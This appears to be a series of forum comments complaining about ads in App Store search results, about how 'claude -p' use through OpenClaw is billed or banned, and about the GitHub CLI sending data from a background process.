Honestly the last time I remember using the App Store was years ago and I can't recall if they had ads or not. Imo it's distasteful and I wish they didn't have them. Still leagues better than the fucking ads in the start menu which caused me to give up on gaming and Windows forever.
If I open the app store and search "Gemini", the first result is "ChatGPT (advertisement)"
If I search for my bank, I get another bank. If I search for "Wordle", I get a bunch of ad-supported spamware (both the ad and non-ad results) before the real NYT Games app.
The app store has ads in search results. This is the primary way that my technologically inept relatives end up with the wrong app installed btw, is by searching and clicking the first result, and getting complete trash adware.
Apple should be ashamed of selling out their users.
"claude -p" does not charge api rates by itself, I just ran "claude -p 'write hello world to foo.txt'", and it didn't.
What they changed is that if you have OpenClaw run 'claude -p' for you, that gets your account banned or charged API rates, and if they think your usage of 'claude -p' is maybe OpenClaw, even if it's not, you get charged API rates or banned.
It seems so silly to me. They built a feature with one billing rate, and the feature is a bash command. If you have a bad program run the bash command, you get billed at a different rate, if you have a good script you wrote yourself run it, you're fine, but they have literally no legitimate way to tell the difference since either way it's just a command being run.
The justification going around is that OpenClaw usage is so heavy that it impacts the service for other people, but like OpenClaw was just using the "claude code max" plan, so if they can't handle the usage the plan promises, they should be changing the plan.
If they had instead said "Your claude code max plan, which has XX quota, will get charged API rates if you consistently use 50% of your quota. The quota is actually a lie, it's just the amount you can burst up to once or twice a week, but definitely not every day" and just banned everyone that used claude code a lot, I wouldn't be complaining as much, that'd be much more consistent.
If I run "gh alias set foo bar", and that takes even a marginally perceptible amount of time, I'll feel like the tool I'm using is poorly built since a local alias obviously doesn't need network calls.
I do see that `gh` is spawning a child to do sending in the background (https://github.com/cli/cli/blob/3ad29588b8bf9f2390be652f46ee...), which also is something I'd be annoyed at since having background processes lingering in a shell's session is bad manners for a command that doesn't have a very good reason to do so.
reply